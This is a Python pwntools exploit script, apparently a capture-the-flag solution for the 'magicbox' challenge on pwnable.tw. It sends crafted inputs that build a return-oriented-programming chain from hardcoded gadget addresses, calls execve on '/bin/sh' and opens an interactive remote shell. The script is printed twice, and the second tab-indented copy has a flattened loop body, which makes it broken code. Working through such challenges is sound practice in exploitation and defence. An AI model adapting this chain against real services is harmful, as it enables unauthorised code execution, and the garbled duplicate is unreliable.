hanhanW/magicbox.py

## magicbox.py
#!/usr/bin/env python2
from pwn import *

r = remote('pwning.pwnable.tw', 56746)
int0x80 = p32(0x08049671)
pop3_ret = p32(0x08048913)
pop_eax_ret = p32(0x080bb436)
pop_ebx_ret = p32(0x080481c9)
pop_edx_ecx_ebx_ret = p32(0x0806f060)
call_read = p32(0x0806D56A)
buf = p32(0x080eaf83)

print r.recvuntil(':')
for i in range(10):
    r.sendline('1')
    print r.recvuntil(':')
    r.sendline(chr(i) * 16)
    print r.recvuntil(':')
r.sendline('1')
print r.recvuntil(':')
r.sendline('1'*12+call_read)
print r.recvuntil(':')
r.sendline('1')
print r.recvuntil(':')
r.sendline(pop3_ret + p32(0) + buf + p32(7))
print r.recvuntil(':')
r.sendline('1')
print r.recvuntil(':')
r.sendline(pop_eax_ret + p32(0xb) + pop_edx_ecx_ebx_ret + p32(0))
print r.recvuntil(':')
r.sendline('1')
print r.recvuntil(':')
r.sendline(p32(0) + buf + int0x80)
print r.recvuntil(':')

r.sendline('4')
print r.recvuntil('e')
r.sendline('/bin/sh')
r.interactive()
	#!/usr/bin/env python2
	from pwn import *

	r = remote('pwning.pwnable.tw', 56746)
	int0x80 = p32(0x08049671)
	pop3_ret = p32(0x08048913)
	pop_eax_ret = p32(0x080bb436)
	pop_ebx_ret = p32(0x080481c9)
	pop_edx_ecx_ebx_ret = p32(0x0806f060)
	call_read = p32(0x0806D56A)
	buf = p32(0x080eaf83)

	print r.recvuntil(':')
	for i in range(10):
	r.sendline('1')
	print r.recvuntil(':')
	r.sendline(chr(i) * 16)
	print r.recvuntil(':')
	r.sendline('1')
	print r.recvuntil(':')
	r.sendline('1'*12+call_read)
	print r.recvuntil(':')
	r.sendline('1')
	print r.recvuntil(':')
	r.sendline(pop3_ret + p32(0) + buf + p32(7))
	print r.recvuntil(':')
	r.sendline('1')
	print r.recvuntil(':')
	r.sendline(pop_eax_ret + p32(0xb) + pop_edx_ecx_ebx_ret + p32(0))
	print r.recvuntil(':')
	r.sendline('1')
	print r.recvuntil(':')
	r.sendline(p32(0) + buf + int0x80)
	print r.recvuntil(':')

	r.sendline('4')
	print r.recvuntil('e')
	r.sendline('/bin/sh')
	r.interactive()